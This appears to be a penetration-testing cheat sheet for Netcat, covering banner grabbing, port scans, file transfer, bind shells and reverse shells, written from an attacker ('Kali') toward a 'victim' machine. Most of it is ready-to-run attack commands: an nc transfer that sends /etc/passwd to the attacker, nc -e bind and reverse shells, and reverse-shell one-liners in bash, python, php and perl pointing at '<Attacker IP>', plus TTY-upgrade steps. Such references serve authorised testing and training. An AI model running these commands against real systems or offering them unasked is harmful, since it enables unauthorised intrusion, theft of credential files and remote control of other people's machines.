Netcat

Netcat is a simple utility which reads and writes data across network connections, using TCP or UDP protocol. Available in Linux and Windows. Netcat runs in two modes: client and server.

💡 Communication is not encrypted and there is no authentication. Use Ncat instead.

Client Mode
Server Mode
File Transfer
Port scan
Bind Shell
Reverse Shell
Upgrade to full shell

Help

nc -help
man netcat
-n : numeric-only IP addresses, skip DNS name resolution
-v : verbose [use twice to be more verbose]
-w secs : timeout for connects and final net reads
-z : zero-I/O mode [used for scanning]

Client Mode

Connecting to a TCP/UDP port can be useful in several situations:

  • To check if a port is open or closed
  • To read a banner from the service listening on a port
  • To connect to a network service manually

Connect to a TCP port (use -u for UDP)

Also used to grab the banner of a remote server: see versions of app/services running on a remote computer.

IP=x.x.x.x
PORT=4444
nc -nv $IP $PORT
for IP in $(cat ./IPs.txt | grep -v '#'); do nc -nv $IP $PORT; done;

💡 For interacting with a specific service, see cheatsheets for Ports & Protocols

Server Mode (listen)

nc -nlvp 4444
sudo nc -nlvp 443

File Transfer

❗ There is no feedback when file transfer is completed.

Transfer file – From Server to Client

Server mode (e.g. Kali)

Anyone who connects to this port will receive the file.

nc -nlvkp 5555 < ~/exploit.py

Client mode (e.g. victim machine)

nc -nv $IP 5555 > exploit.py
[Ctrl+C]

Transfer file – From Client to Server

Server mode (e.g. Kali)

nc -nlvkp 4444 > ~/victim_passwd
[Ctrl+C]

Client mode (e.g. victim machine)

nc -nv $IP 4444 < /etc/passwd

Port scans

TCP CONNECT / SYN scan / stealth scan

❗ Modern firewalls can still detect this

nc -nv -w 1 -z $IP 3388-3390
nc -nv -w 1 -z $IP 1-65535 > port-scan-${IP}.txt

Top 100 ports (from nmap list)

nc -nv -w 1 -z $IP 7 9 13 21-23 25-26 37 53 79-81 88 106 110-111 113 119 135 139 143-144 179 199 389 427 443-445 465 513-515 543-544 548 554 587 631 646 873 990 993 995 1025-1029 1110 1433 1720 1723 1755 1900 2000-2001 2049 2121 2717 3000 3128 3306 3389 3986 4899 5000 5009 5051 5060 5101 5190 5357 5432 5631 5666 5800 5900 6000-6001 6646 7070 8000 8008-8009 8080-8081 8443 8888 9100 9999-10000 32768 49152-49157

UDP Scan

Open ports don’t reply back, closed ports send ICMP port unreachable packet. This can lead to false positives in your scan, and you will regularly see UDP port scans showing all UDP ports open on a scanned machine.

nc -nv -u -z -w 1 x.x.x.x 160-162

Bind shell

❗ Netcat must be compiled with the -DGAPING_SECURITY_HOLE flag to enable the -e option to execute a program after receiving a connection. Default in Kali Linux, but not in modern Linux/BSD systems.

Client –> Bind shell –> Server

Server mode (Victim)

nc -nlvkp 4444 -e cmd.exe    # Windows, sometimes nc.exe
nc -nlvkp 4444 -e /bin/bash  # Linux

Client mode (Kali)

nc -nv $IP 4444

Reverse shell

Send a command shell to a host listening on a port.

Server mode (Kali)

nc -nlvkp 4444

Client mode (Victim sends reverse shell to Kali)

nc -nv $IP 4444 -e /bin/bash    # Linux
nc.exe -nv $IP 4444 -e cmd.exe  # Windows, sometimes nc.exe

💡 If netcat is not available on victim’s machine, use other reverse shells. Also see the reverse shell cheat sheet from HighOnCoffee.

# If bash is available
bash -i >& /dev/tcp/<Attacker IP>/4444 0>&1
/bin/bash | nc <Attacker IP> 4444

# If python is installed
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Attacker IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# If php is installed
php -r '$sock=fsockopen("<Attacker IP>",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# If perl is installed
perl -e 'use Socket;$i="<Attacker IP>";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Upgrade to full shell

See Upgrade to full shell / Spawning TTY Shell.

python -c 'import pty;pty.spawn("/bin/bash")'

First, background your netcat shell by typing:

Ctrl+z

This will appear as though you’ve lost your shell.

stty raw -echo

Finally, foreground the netcat shell by typing:

fg + [Enter x 2]

This should return your shell with tab auto-completion enabled.